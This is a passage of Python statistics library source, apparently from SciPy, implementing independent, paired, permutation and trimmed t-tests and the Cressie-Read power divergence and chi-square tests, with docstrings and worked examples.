Ttest_indResult(statistic=array([nan, nan]), pvalue=array([nan, nan]))
>>> a = np.zeros((3, 0, 9))
>>> b = np.zeros((1, 10))
>>> stat, p = _ttest_nans(a, b, -1, Ttest_indResult)
>>> stat
array([], shape=(3, 0), dtype=float64)
>>> p
array([], shape=(3, 0), dtype=float64)
>>> a = np.zeros(10)
>>> b = np.zeros(7)
>>> _ttest_nans(a, b, 0, Ttest_indResult)
Ttest_indResult(statistic=nan, pvalue=nan)
"""
shp = _broadcast_shapes_with_dropped_axis(a, b, axis)
if len(shp) == 0:
t = np.nan
p = np.nan
else:
t = np.full(shp, fill_value=np.nan)
p = t.copy()
return namedtuple_type(t, p)
def ttest_ind(a, b, axis=0, equal_var=True, nan_policy='propagate',
permutations=None, random_state=None, alternative="two-sided",
trim=0):
"""
Calculate the T-test for the means of *two independent* samples of scores.
This is a test for the null hypothesis that 2 independent samples
have identical average (expected) values. This test assumes that the
populations have identical variances by default.
Parameters
----------
a, b : array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
.. versionadded:: 0.11.0
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
The 'omit' option is not currently available for permutation tests or
one-sided asymptotic tests.
permutations : non-negative int, np.inf, or None (default), optional
If 0 or None (default), use the t-distribution to calculate p-values.
Otherwise, `permutations` is the number of random permutations that
will be used to estimate p-values using a permutation test. If
`permutations` equals or exceeds the number of distinct partitions of
the pooled data, an exact test is performed instead (i.e. each
distinct partition is used exactly once). See Notes for details.
.. versionadded:: 1.7.0
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
If `seed` is None (or `np.random`), the `numpy.random.RandomState`
singleton is used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` or ``RandomState`` instance then
that instance is used.
Pseudorandom number generator state used to generate permutations
(used only when `permutations` is not None).
.. versionadded:: 1.7.0
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the means of the distributions underlying the samples
are unequal.
* 'less': the mean of the distribution underlying the first sample
is less than the mean of the distribution underlying the second
sample.
* 'greater': the mean of the distribution underlying the first
sample is greater than the mean of the distribution underlying
the second sample.
.. versionadded:: 1.6.0
trim : float, optional
If nonzero, performs a trimmed (Yuen's) t-test.
Defines the fraction of elements to be trimmed from each end of the
input samples. If 0 (default), no elements will be trimmed from either
side. The number of trimmed elements from each tail is the floor of the
trim times the number of elements. Valid range is [0, .5).
.. versionadded:: 1.7
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The p-value.
Notes
-----
Suppose we observe two independent samples, e.g. flower petal lengths, and
we are considering whether the two samples were drawn from the same
population (e.g. the same species of flower or two species with similar
petal characteristics) or two different populations.
The t-test quantifies the difference between the arithmetic means
of the two samples. The p-value quantifies the probability of observing
as or more extreme values assuming the null hypothesis, that the
samples are drawn from populations with the same population means, is true.
A p-value larger than a chosen threshold (e.g. 5% or 1%) indicates that
our observation is not so unlikely to have occurred by chance. Therefore,
we do not reject the null hypothesis of equal population means.
If the p-value is smaller than our threshold, then we have evidence
against the null hypothesis of equal population means.
By default, the p-value is determined by comparing the t-statistic of the
observed data against a theoretical t-distribution.
When ``1 < permutations < binom(n, k)``, where
* ``k`` is the number of observations in `a`,
* ``n`` is the total number of observations in `a` and `b`, and
* ``binom(n, k)`` is the binomial coefficient (``n`` choose ``k``),
the data are pooled (concatenated), randomly assigned to either group `a`
or `b`, and the t-statistic is calculated. This process is performed
repeatedly (`permutations` times), generating a distribution of the
t-statistic under the null hypothesis, and the t-statistic of the observed
data is compared to this distribution to determine the p-value. When
``permutations >= binom(n, k)``, an exact test is performed: the data are
partitioned between the groups in each distinct way exactly once.
The permutation test can be computationally expensive and not necessarily
more accurate than the analytical test, but it does not make strong
assumptions about the shape of the underlying distribution.
Use of trimming is commonly referred to as the trimmed t-test. At times
called Yuen's t-test, this is an extension of Welch's t-test, with the
difference being the use of winsorized means in calculation of the variance
and the trimmed sample size in calculation of the statistic. Trimming is
recommended if the underlying distribution is long-tailed or contaminated
with outliers [4]_.
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
.. [3] http://en.wikipedia.org/wiki/Resampling_%28statistics%29
.. [4] Yuen, Karen K. "The Two-Sample Trimmed t for Unequal Population
Variances." Biometrika, vol. 61, no. 1, 1974, pp. 165-170. JSTOR,
www.jstor.org/stable/2334299. Accessed 30 Mar. 2021.
.. [5] Yuen, Karen K., and W. J. Dixon. "The Approximate Behaviour and
Performance of the Two-Sample Trimmed t." Biometrika, vol. 60,
no. 2, 1973, pp. 369-374. JSTOR, www.jstor.org/stable/2334550.
Accessed 30 Mar. 2021.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
Test with samples with identical means:
>>> rvs1 = stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
>>> rvs2 = stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs2)
Ttest_indResult(statistic=-0.4390847099199348, pvalue=0.6606952038870015)
>>> stats.ttest_ind(rvs1, rvs2, equal_var=False)
Ttest_indResult(statistic=-0.4390847099199348, pvalue=0.6606952553131064)
`ttest_ind` underestimates p for unequal variances:
>>> rvs3 = stats.norm.rvs(loc=5, scale=20, size=500, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs3)
Ttest_indResult(statistic=-1.6370984482905417, pvalue=0.1019251574705033)
>>> stats.ttest_ind(rvs1, rvs3, equal_var=False)
Ttest_indResult(statistic=-1.637098448290542, pvalue=0.10202110497954867)
When ``n1 != n2``, the equal variance t-statistic is no longer equal to the
unequal variance t-statistic:
>>> rvs4 = stats.norm.rvs(loc=5, scale=20, size=100, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs4)
Ttest_indResult(statistic=-1.9481646859513422, pvalue=0.05186270935842703)
>>> stats.ttest_ind(rvs1, rvs4, equal_var=False)
Ttest_indResult(statistic=-1.3146566100751664, pvalue=0.1913495266513811)
T-test with different means, variance, and n:
>>> rvs5 = stats.norm.rvs(loc=8, scale=20, size=100, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs5)
Ttest_indResult(statistic=-2.8415950600298774, pvalue=0.0046418707568707885)
>>> stats.ttest_ind(rvs1, rvs5, equal_var=False)
Ttest_indResult(statistic=-1.8686598649188084, pvalue=0.06434714193919686)
When performing a permutation test, more permutations typically yields
more accurate results. Use a ``np.random.Generator`` to ensure
reproducibility:
>>> stats.ttest_ind(rvs1, rvs5, permutations=10000,
... random_state=rng)
Ttest_indResult(statistic=-2.8415950600298774, pvalue=0.0052)
Take these two samples, one of which has an extreme tail.
>>> a = (56, 128.6, 12, 123.8, 64.34, 78, 763.3)
>>> b = (1.1, 2.9, 4.2)
Use the `trim` keyword to perform a trimmed (Yuen) t-test. For example,
using 20% trimming, ``trim=.2``, the test will reduce the impact of one
(``np.floor(trim*len(a))``) element from each tail of sample `a`. It will
have no effect on sample `b` because ``np.floor(trim*len(b))`` is 0.
>>> stats.ttest_ind(a, b, trim=.2)
Ttest_indResult(statistic=3.4463884028073513,
pvalue=0.01369338726499547)
"""
if not (0 <= trim < .5):
raise ValueError("Trimming percentage should be 0 <= `trim` < .5.")
a, b, axis = _chk2_asarray(a, b, axis)
# check both a and b
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
if permutations or trim != 0:
raise ValueError("nan-containing/masked inputs with "
"nan_policy='omit' are currently not "
"supported by permutation tests or "
"trimmed tests.")
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
return mstats_basic.ttest_ind(a, b, axis, equal_var, alternative)
if a.size == 0 or b.size == 0:
return _ttest_nans(a, b, axis, Ttest_indResult)
if permutations is not None and permutations != 0:
if trim != 0:
raise ValueError("Permutations are currently not supported "
"with trimming.")
if permutations < 0 or (np.isfinite(permutations) and
int(permutations) != permutations):
raise ValueError("Permutations must be a non-negative integer.")
res = _permutation_ttest(a, b, permutations=permutations,
axis=axis, equal_var=equal_var,
nan_policy=nan_policy,
random_state=random_state,
alternative=alternative)
else:
n1 = a.shape[axis]
n2 = b.shape[axis]
if trim == 0:
v1 = np.var(a, axis, ddof=1)
v2 = np.var(b, axis, ddof=1)
m1 = np.mean(a, axis)
m2 = np.mean(b, axis)
else:
v1, m1, n1 = _ttest_trim_var_mean_len(a, trim, axis)
v2, m2, n2 = _ttest_trim_var_mean_len(b, trim, axis)
if equal_var:
df, denom = _equal_var_ttest_denom(v1, n1, v2, n2)
else:
df, denom = _unequal_var_ttest_denom(v1, n1, v2, n2)
res = _ttest_ind_from_stats(m1, m2, denom, df, alternative)
return Ttest_indResult(*res)
def _ttest_trim_var_mean_len(a, trim, axis):
"""Variance, mean, and length of winsorized input along specified axis"""
# for use with `ttest_ind` when trimming.
# further calculations in this test assume that the inputs are sorted.
# From [4] Section 1 "Let x_1, ..., x_n be n ordered observations..."
a = np.sort(a, axis=axis)
# `g` is the number of elements to be replaced on each tail, converted
# from a percentage amount of trimming
n = a.shape[axis]
g = int(n * trim)
# Calculate the Winsorized variance of the input samples according to
# specified `g`
v = _calculate_winsorized_variance(a, g, axis)
# the total number of elements in the trimmed samples
n -= 2 * g
# calculate the g-times trimmed mean, as defined in [4] (1-1)
m = trim_mean(a, trim, axis=axis)
return v, m, n
def _calculate_winsorized_variance(a, g, axis):
"""Calculates g-times winsorized variance along specified axis"""
# it is expected that the input `a` is sorted along the correct axis
if g == 0:
return np.var(a, ddof=1, axis=axis)
# move the intended axis to the end that way it is easier to manipulate
a_win = np.moveaxis(a, axis, -1)
# save where NaNs are for later use.
nans_indices = np.any(np.isnan(a_win), axis=-1)
# Winsorization and variance calculation are done in one step in [4]
# (1-3), but here winsorization is done first; replace the left and
# right sides with the repeating value. This can be seen in effect in (
# 1-3) in [4], where the leftmost and rightmost tails are replaced with
# `(g + 1) * x_{g + 1}` on the left and `(g + 1) * x_{n - g}` on the
# right. Zero-indexing turns `g + 1` to `g`, and `n - g` to `- g - 1` in
# array indexing.
a_win[..., :g] = a_win[..., [g]]
a_win[..., -g:] = a_win[..., [-g - 1]]
# Determine the variance. In [4], the degrees of freedom is expressed as
# `h - 1`, where `h = n - 2g` (unnumbered equations in Section 1, end of
# page 369, beginning of page 370). This is converted to NumPy's format,
# `n - ddof` for use with `np.var`. The result is converted to an
# array to accommodate indexing later.
var_win = np.asarray(np.var(a_win, ddof=(2 * g + 1), axis=-1))
# with `nan_policy='propagate'`, NaNs may be completely trimmed out
# because they were sorted into the tail of the array. In these cases,
# replace computed variances with `np.nan`.
var_win[nans_indices] = np.nan
return var_win
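# Illustrative sketch (hypothetical helper, not part of the public API): the
# same g-times winsorization applied to a single sorted 1-D sample, mirroring
# the tail replacement performed axis-wise above.
def _winsorize_sorted_1d(a, g):
    a = np.sort(np.asarray(a, dtype=float))
    if g > 0:
        a[:g] = a[g]          # left tail replaced by x_{g+1} (0-indexed a[g])
        a[-g:] = a[-g - 1]    # right tail replaced by x_{n-g}
    return a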
def _data_partitions(data, permutations, size_a, axis=-1, random_state=None):
"""All partitions of data into sets of given lengths, ignoring order"""
random_state = check_random_state(random_state)
if axis < 0: # we'll be adding a new dimension at the end
axis = data.ndim + axis
# prepare permutation indices
size = data.shape[axis]
# number of distinct combinations
n_max = special.comb(size, size_a)
if permutations < n_max:
indices = np.array([random_state.permutation(size)
for i in range(permutations)]).T
else:
permutations = n_max
indices = np.array([np.concatenate(z)
for z in _all_partitions(size_a, size-size_a)]).T
data = data.swapaxes(axis, -1) # so we can index along a new dimension
data = data[..., indices] # generate permutations
data = data.swapaxes(-2, axis) # restore original axis order
data = np.moveaxis(data, -1, 0) # permutations indexed along axis 0
return data, permutations
def _calc_t_stat(a, b, equal_var, axis=-1):
"""Calculate the t statistic along the given dimension."""
na = a.shape[axis]
nb = b.shape[axis]
avg_a = np.mean(a, axis=axis)
avg_b = np.mean(b, axis=axis)
var_a = np.var(a, axis=axis, ddof=1)
var_b = np.var(b, axis=axis, ddof=1)
if not equal_var:
denom = _unequal_var_ttest_denom(var_a, na, var_b, nb)[1]
else:
denom = _equal_var_ttest_denom(var_a, na, var_b, nb)[1]
return (avg_a-avg_b)/denom
def _permutation_ttest(a, b, permutations, axis=0, equal_var=True,
nan_policy='propagate', random_state=None,
alternative="two-sided"):
"""
Calculates the T-test for the means of TWO INDEPENDENT samples of scores
using permutation methods.
This test is similar to `stats.ttest_ind`, except it doesn't rely on an
approximate normality assumption since it uses a permutation test.
This function is only called from ttest_ind when permutations is not None.
Parameters
----------
a, b : array_like
The arrays must be broadcastable, except along the dimension
corresponding to `axis` (the zeroth, by default).
axis : int, optional
The axis over which to operate on a and b.
permutations : int, optional
Number of permutations used to calculate p-value. If greater than or
equal to the number of distinct permutations, perform an exact test.
equal_var : bool, optional
If False, Welch's t-test, which does not assume equal population
variance, is conducted. Otherwise, a standard two-sample t-test assuming
equal population variances is conducted.
random_state : {None, int, `numpy.random.Generator`}, optional
If `seed` is None the `numpy.random.Generator` singleton is used.
If `seed` is an int, a new ``Generator`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` instance then that instance is
used.
Pseudorandom number generator state used for generating random
permutations.
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The p-value.
"""
random_state = check_random_state(random_state)
t_stat_observed = _calc_t_stat(a, b, equal_var, axis=axis)
na = a.shape[axis]
mat = _broadcast_concatenate((a, b), axis=axis)
mat = np.moveaxis(mat, axis, -1)
mat_perm, permutations = _data_partitions(mat, permutations, size_a=na,
random_state=random_state)
a = mat_perm[..., :na]
b = mat_perm[..., na:]
t_stat = _calc_t_stat(a, b, equal_var)
compare = {"less": np.less_equal,
"greater": np.greater_equal,
"two-sided": lambda x, y: (x <= -np.abs(y)) | (x >= np.abs(y))}
# Calculate the p-values
cmps = compare[alternative](t_stat, t_stat_observed)
pvalues = cmps.sum(axis=0) / permutations
# nans propagate naturally in statistic calculation, but need to be
# propagated manually into pvalues
if nan_policy == 'propagate' and np.isnan(t_stat_observed).any():
if np.ndim(pvalues) == 0:
pvalues = np.float64(np.nan)
else:
pvalues[np.isnan(t_stat_observed)] = np.nan
return (t_stat_observed, pvalues)
def _get_len(a, axis, msg):
try:
n = a.shape[axis]
except IndexError:
raise np.AxisError(axis, a.ndim, msg) from None
return n
Ttest_relResult = namedtuple('Ttest_relResult', ('statistic', 'pvalue'))
def ttest_rel(a, b, axis=0, nan_policy='propagate', alternative="two-sided"):
"""Calculate the t-test on TWO RELATED samples of scores, a and b.
This is a test for the null hypothesis that two related or
repeated samples have identical average (expected) values.
Parameters
----------
a, b : array_like
The arrays must have the same shape.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the means of the distributions underlying the samples
are unequal.
* 'less': the mean of the distribution underlying the first sample
is less than the mean of the distribution underlying the second
sample.
* 'greater': the mean of the distribution underlying the first
sample is greater than the mean of the distribution underlying
the second sample.
.. versionadded:: 1.6.0
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
The p-value.
Notes
-----
Examples for use are scores of the same set of students in
different exams, or repeated sampling from the same units. The
test measures whether the average score differs significantly
across samples (e.g. exams). If we observe a large p-value, for
example greater than 0.05 or 0.1, then we cannot reject the null
hypothesis of identical average scores. If the p-value is smaller
than the threshold, e.g. 1%, 5% or 10%, then we reject the null
hypothesis of equal averages. Small p-values are associated with
large t-statistics.
References
----------
https://en.wikipedia.org/wiki/T-test#Dependent_t-test_for_paired_samples
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> rvs1 = stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
>>> rvs2 = (stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
... + stats.norm.rvs(scale=0.2, size=500, random_state=rng))
>>> stats.ttest_rel(rvs1, rvs2)
Ttest_relResult(statistic=-0.4549717054410304, pvalue=0.6493274702088672)
>>> rvs3 = (stats.norm.rvs(loc=8, scale=10, size=500, random_state=rng)
... + stats.norm.rvs(scale=0.2, size=500, random_state=rng))
>>> stats.ttest_rel(rvs1, rvs3)
Ttest_relResult(statistic=-5.879467544540889, pvalue=7.540777129099917e-09)
"""
a, b, axis = _chk2_asarray(a, b, axis)
cna, npa = _contains_nan(a, nan_policy)
cnb, npb = _contains_nan(b, nan_policy)
contains_nan = cna or cnb
if npa == 'omit' or npb == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
m = ma.mask_or(ma.getmask(a), ma.getmask(b))
aa = ma.array(a, mask=m, copy=True)
bb = ma.array(b, mask=m, copy=True)
return mstats_basic.ttest_rel(aa, bb, axis, alternative)
na = _get_len(a, axis, "first argument")
nb = _get_len(b, axis, "second argument")
if na != nb:
raise ValueError('unequal length arrays')
if na == 0:
return _ttest_nans(a, b, axis, Ttest_relResult)
n = a.shape[axis]
df = n - 1
d = (a - b).astype(np.float64)
v = np.var(d, axis, ddof=1)
dm = np.mean(d, axis)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(dm, denom)
t, prob = _ttest_finish(df, t, alternative)
return Ttest_relResult(t, prob)
# Map from names to lambda_ values used in power_divergence().
_power_div_lambda_names = {
"pearson": 1,
"log-likelihood": 0,
"freeman-tukey": -0.5,
"mod-log-likelihood": -1,
"neyman": -2,
"cressie-read": 2/3,
}
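# Illustrative sketch (the name `_cressie_read_statistic` is hypothetical and
# this helper is not part of the public API): the power divergence statistic
# for a scalar `lambda_`, assuming strictly positive observed and expected
# frequencies,
#     2 / (lambda * (lambda + 1)) * sum(f_obs * ((f_obs / f_exp)**lambda - 1)),
# with the usual limiting forms at lambda = 0 (G-test) and lambda = -1.
def _cressie_read_statistic(f_obs, f_exp, lambda_):
    f_obs = np.asarray(f_obs, dtype=float)
    f_exp = np.asarray(f_exp, dtype=float)
    if lambda_ == 0:            # log-likelihood ratio (G-test)
        terms = 2.0 * f_obs * np.log(f_obs / f_exp)
    elif lambda_ == -1:         # modified log-likelihood ratio
        terms = 2.0 * f_exp * np.log(f_exp / f_obs)
    else:                       # includes Pearson (lambda_ = 1)
        terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
        terms *= 2.0 / (lambda_ * (lambda_ + 1))
    return terms.sum()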
def _count(a, axis=None):
"""Count the number of non-masked elements of an array.
This function behaves like `np.ma.count`, but is much faster
for ndarrays.
"""
if hasattr(a, 'count'):
num = a.count(axis=axis)
if isinstance(num, np.ndarray) and num.ndim == 0:
# In some cases, the `count` method returns a scalar array (e.g.
# np.array(3)), but we want a plain integer.
num = int(num)
else:
if axis is None:
num = a.size
else:
num = a.shape[axis]
return num
def _m_broadcast_to(a, shape):
if np.ma.isMaskedArray(a):
return np.ma.masked_array(np.broadcast_to(a, shape),
mask=np.broadcast_to(a.mask, shape))
return np.broadcast_to(a, shape, subok=True)
Power_divergenceResult = namedtuple('Power_divergenceResult',
('statistic', 'pvalue'))
def power_divergence(f_obs, f_exp=None, ddof=0, axis=0, lambda_=None):
"""Cressie-Read power divergence statistic and goodness of fit test.
This function tests the null hypothesis that the categorical data
has the given frequencies, using the Cressie-Read power divergence
statistic.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
lambda_ : float or str, optional
The power in the Cressie-Read power divergence statistic. The default
is 1. For convenience, `lambda_` may be assigned one of the following
strings, in which case the corresponding numerical value is used:
* ``"pearson"`` (value 1)
Pearson's chi-squared statistic. In this case, the function is
equivalent to `chisquare`.
* ``"log-likelihood"`` (value 0)
Log-likelihood ratio. Also known as the G-test [3]_.
* ``"freeman-tukey"`` (value -1/2)
Freeman-Tukey statistic.
* ``"mod-log-likelihood"`` (value -1)
Modified log-likelihood ratio.
* ``"neyman"`` (value -2)
Neyman's statistic.
* ``"cressie-read"`` (value 2/3)
The power recommended in [5]_.
Returns
-------
statistic : float or ndarray
The Cressie-Read power divergence test statistic. The value is
a float if `axis` is None or if `f_obs` and `f_exp` are 1-D.
pvalue : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `stat` are scalars.
See Also
--------
chisquare
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
Also, the sum of the observed and expected frequencies must be the same
for the test to be valid; `power_divergence` raises an error if the sums
do not agree within a relative tolerance of ``1e-8``.
When `lambda_` is less than zero, the formula for the statistic involves
dividing by `f_obs`, so a warning or error may be generated if any value
in `f_obs` is 0.
Similarly, a warning or error may be generated if any value in `f_exp` is
zero when `lambda_` >= 0.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not a chisquare, in which case this
test is not appropriate.
This function handles masked arrays. If an element of `f_obs` or `f_exp`
is masked, then data at that position is ignored, and does not count
towards the size of the data set.
.. versionadded:: 0.13.0
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171015035606/http://faculty.vassar.edu/lowry/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
.. [3] "G-test", https://en.wikipedia.org/wiki/G-test
.. [4] Sokal, R. R. and Rohlf, F. J. "Biometry: the principles and
practice of statistics in biological research", New York: Freeman
(1981)
.. [5] Cressie, N. and Read, T. R. C., "Multinomial Goodness-of-Fit
Tests", J. Royal Stat. Soc. Series B, Vol. 46, No. 3 (1984),
pp. 440-464.
Examples
--------
(See `chisquare` for more examples.)
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies. Here we
perform a G-test (i.e. use the log-likelihood ratio statistic):
>>> from scipy.stats import power_divergence
>>> power_divergence([16, 18, 16, 14, 12, 12], lambda_='log-likelihood')
(2.006573162632538, 0.84823476779463769)
The expected frequencies can be given with the `f_exp` argument:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[16, 16, 16, 16, 16, 8],
... lambda_='log-likelihood')
(3.3281031458963746, 0.6495419288047497)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> power_divergence(obs, lambda_="log-likelihood")
(array([ 2.00657316, 6.77634498]), array([ 0.84823477, 0.23781225]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> power_divergence(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> power_divergence(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
test statistic with `ddof`.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we must use ``axis=1``:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8],
... [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
# Convert the input argument `lambda_` to a numerical value.
if isinstance(lambda_, str):
if lambda_ not in _power_div_lambda_names:
names = repr(list(_power_div_lambda_names.keys()))[1:-1]
raise ValueError("invalid string for lambda_: {0!r}. "
"Valid strings are {1}".format(lambda_, names))
lambda_ = _power_div_lambda_names[lambda_]
elif lambda_ is None:
lambda_ = 1
f_obs = np.asanyarray(f_obs)
f_obs_float = f_obs.astype(np.float64)
if f_exp is not None:
f_exp = np.asanyarray(f_exp)
bshape = _broadcast_shapes(f_obs_float.shape, f_exp.shape)
f_obs_float = _m_broadcast_to(f_obs_float, bshape)
f_exp = _m_broadcast_to(f_exp, bshape)
rtol = 1e-8 # to pass existing tests
with np.errstate(invalid='ignore'):
f_obs_sum = f_obs_float.sum(axis=axis)
f_exp_sum = f_exp.sum(axis=axis)
relative_diff = (np.abs(f_obs_sum - f_exp_sum) /
np.minimum(f_obs_sum, f_exp_sum))
diff_gt_tol = (relative_diff > rtol).any()
if diff_gt_tol:
msg = (f"For each axis slice, the sum of the observed "
f"frequencies must agree with the sum of the "
f"expected frequencies to a relative tolerance "
f"of {rtol}, but the percent differences are:\n"
f"{relative_diff}")
raise ValueError(msg)
else:
# Ignore 'invalid' errors so the edge case of a data set with length 0
# is handled without spurious warnings.
with np.errstate(invalid='ignore'):
f_exp = f_obs.mean(axis=axis, keepdims=True)
# `terms` is the array of terms that are summed along `axis` to create
# the test statistic. We use some specialized code for a few special
# cases of lambda_.
if lambda_ == 1:
# Pearson's chi-squared statistic
terms = (f_obs_float - f_exp)**2 / f_exp
elif lambda_ == 0:
# Log-likelihood ratio (i.e. G-test)
terms = 2.0 * special.xlogy(f_obs, f_obs / f_exp)
elif lambda_ == -1:
# Modified log-likelihood ratio
terms = 2.0 * special.xlogy(f_exp, f_exp / f_obs)
else:
# General Cressie-Read power divergence.
terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
terms /= 0.5 * lambda_ * (lambda_ + 1)
stat = terms.sum(axis=axis)
num_obs = _count(terms, axis=axis)
ddof = asarray(ddof)
p = distributions.chi2.sf(stat, num_obs - 1 - ddof)
return Power_divergenceResult(stat, p)
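# Illustrative sketch, not part of the public API: the general Cressie-Read
# statistic computed by hand for lambda_ = 2/3 with uniform expected
# frequencies. The `_demo_` name and the example counts are made up for
# illustration; the result should match
# power_divergence(f_obs, lambda_="cressie-read").statistic.
def _demo_power_divergence_by_hand():
    f_obs = np.array([16, 18, 16, 14, 12, 12], dtype=np.float64)
    f_exp = np.full_like(f_obs, f_obs.mean())
    lambda_ = 2.0 / 3.0
    terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
    return terms.sum() / (0.5 * lambda_ * (lambda_ + 1))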
def chisquare(f_obs, f_exp=None, ddof=0, axis=0):
"""Calculate a one-way chi-square test.
The chi-square test tests the null hypothesis that the categorical data
has the given frequencies.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
Returns
-------
chisq : float or ndarray
The chi-squared test statistic. The value is a float if `axis` is
None or `f_obs` and `f_exp` are 1-D.
p : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `chisq` are scalars.
See Also
--------
scipy.stats.power_divergence
scipy.stats.fisher_exact : Fisher exact test on a 2x2 contingency table.
scipy.stats.barnard_exact : An unconditional exact test. An alternative
to chi-squared test for small sample sizes.
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5. According to [3]_, the
total number of samples is recommended to be greater than 13,
otherwise exact tests (such as Barnard's Exact test) should be used
because they do not overreject.
Also, the sum of the observed and expected frequencies must be the same
for the test to be valid; `chisquare` raises an error if the sums do not
agree within a relative tolerance of ``1e-8``.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not chi-square, in which case this test
is not appropriate.
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171022032306/http://vassarstats.net:80/textbook/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
.. [3] Pearson, Karl. "On the criterion that a given system of deviations from the probable
